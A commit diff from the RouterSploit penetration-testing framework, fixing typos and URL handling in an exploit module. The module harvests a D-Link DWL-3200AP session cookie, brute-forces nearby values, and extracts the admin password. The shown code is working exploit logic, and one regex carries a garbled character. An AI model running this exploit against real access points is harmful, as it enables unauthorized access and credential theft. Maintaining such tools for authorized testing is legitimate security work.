Code fixes

03178845 · Joshua Abraham · 411bc498 · 03178845
Commit 03178845 authored Feb 26, 2017 by Joshua Abraham
Hide whitespace changes
Inline Side-by-side

Showing with 6 additions and 5 deletions

dwl_3200ap_password_disclosure.py .../modules/exploits/dlink/dwl_3200ap_password_disclosure.py +6 -5

No files found.
--- a/routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py
@@ -21,7 +21,7 @@ class Exploit(exploits.Exploit):
        'description': 'Exploits DLINK DWL3200 access points weak cookie value',
        'authors': [
            'pws',  # Vulnerability discovery
-            'Josh Abraham <sinisterpatrician[at]google.com>',  # routesploit module
+            'Josh Abraham <sinisterpatrician[at]google.com>',  # routersploit module
        ],
        'references': [
            'https://www.exploit-db.com/exploits/34206/',
@@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
    def run(self):
        if self.check():
            cookie_value = self.get_cookie()
-            print_success("Cookie retrived: {}".format(cookie_value))
+            print_success("Cookie retrieved: {}".format(cookie_value))

            cookie_int = int(cookie_value, 16)
            start = cookie_int - 3600
@@ -61,10 +61,11 @@ class Exploit(exploits.Exploit):
        """
        Method that retrieves current cookie from AP
        """
+        url = "{}:{}".format(self.target, self.port)
        pattern = "RpWebID=([a-z0-9]{8})"
        print_status("Attempting to get cookie...")
        try:
-            r = http_request(method='GET', url=self.target, timeout=3)
+            r = http_request(method='GET', url=url, timeout=3)
            tgt_cookie = re.search(pattern, r.text)
            if tgt_cookie is None:
                print_error("Unable to retrieve cookie")
@@ -81,9 +82,9 @@ class Exploit(exploits.Exploit):
        cookie = dict(RpWebID=cookie_int)
        try:
            r = http_request(method='GET', url=url, cookie=cookie, timeout=10)
-            pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
-            if ('NAME="OldPwd"' in r.content):
+            if ('NAME="OldPwd"' in r.text):
                print_success("Cookie {} is valid!".format(cookie_int))
+                pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
                password = re.findall(pattern, r.content)[0].replace('&', ';&')[1:] + ";"
                print_success("Target password is : {}".format(password))
        except Exception: